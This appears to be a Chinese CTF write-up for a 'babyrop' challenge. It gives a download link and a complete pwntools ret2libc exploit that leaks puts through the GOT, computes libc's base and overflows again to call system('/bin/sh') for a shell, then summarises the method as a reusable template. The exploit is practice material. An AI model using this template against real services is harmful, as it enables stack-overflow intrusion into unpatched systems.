题目地址:链接:
https://pan.baidu.com/s/1isG2u-fpihbPt_Lumd4q5A?pwd=r9vn
提取码:r9vn
脚本展示:
from pwn import*
p=process('./babyrop')
context.log_level='debug'
gdb.attach(p)
elf=ELF("./babyrop")
libc=ELF("/lib/x86_64-linux-gnu/libc.so.6")
padding=0x28
pop_rdi_ret_addr=0x400733
#ida观察puts函数作为泄露函数,并且参数只有一个,因此,我们ROPgadget寻找rdi_ret即可满足。
overflow_addr=0x40067D
payload='a'*0x28+p64(pop_rdi_ret_addr)+p64(elf.got['puts'])+p64(elf.plt['puts'])+p64(overflow_addr)
#栈溢出——rdi——ret——got表传给rdi中——ret到plt表调用puts函数——ret到泄露函数地址
p.sendafter("Pull up your sword and tell me u story!\n",payload)
在此步骤前运行下脚本观察接收到几个字节。决定下一步接受几个字节,然后ljust扩充到8字节满足16进制u64解包。
libc_base_addr=u64(p.recv(6).ljust(8,'\x00'))-libc.symbols['puts']
print(hex(libc_base_addr))
#打印出来libc基址,验证前面脚本是否出错。
system_addr=libc_base_addr+libc.symbols['system']
binsh=libc_base_addr+libc.search("bin/sh\x00").next()
sleep(1)
#程序暂停一秒,防止两个payload一起发送
payload='a'*0x28+p64(pop_rdi_ret_addr)+p64(binsh)+p64(system_addr)
#binsh传入rdi,ret返回system函数
p.send(payload)
p.interactive()
总结本题套路(一定要看!!!)
代码前五行当作固定格式!!!记得改下代码里文件名字,如果这都不会没必要接着往下面看了!!!
先shift+f12查看有无system,binsh
elf=ELF(“文件名”)开局就写
libc=ELF(“libc储存文件夹地址”)用ldd命令查找!
没有就查找puts,write等函数作为泄露函数。
找到溢出函数地址用ida
根据泄露函数参数,使用ROPgadget指令寻找pop地址,不同参数,选择不同的pop地址。也意味着不同的传参数量。
开始根据传参规则构建payload1。
payload1=padding+rdi——ret+got表+plt表+overflow地址;plt表一定要有!
构建完泄露函数payload1后,我们直接发送(记得吃无用字符)。
发送payload1后,我们会得到n个字节。我们根据得到字节的个数进行u64解包.又因为是64位程序,得到的字节不满8bit,我们必须补充到8bit才能u64解包。
libc_base_addr1(带有泄露函数偏移的地址)=u64(p.recv(n).ljust(8,‘\x00’))
#就当作固定格式。\x00是为了补充到8字节后不继续读取
libc_base_addr2(真正地址)=libc_base_addr1(带有偏移的地址)-libc.symbols[‘泄露函数名字’]
有了libc的真实基地址。我们开始寻找libc库函数中,system函数的地址。
system_addr=libc.symbols[‘system’]
同理有了system函数的地址还不够,我们仍然需要bin/sh作为system的参数然后,再返回system(“bin/sh”)!
故此我们再从libc库函数中寻找binsh参数。
libc_addr=libc_base_addr+libc.search(“bin/sh\x00”).next()
欧克,万事俱备只差再次溢出一次了。
我们再次构建溢出函数payload2
payload2=padding+pop_rdi_ret地址+binsh参数传进rdi+system地址传入ret中。返回到system函数中,且system函数会向rdi中读取参数,既运行system(“bin/sh”)成功getsgell!
p.send(payload2)
getshell!
出现bin/dash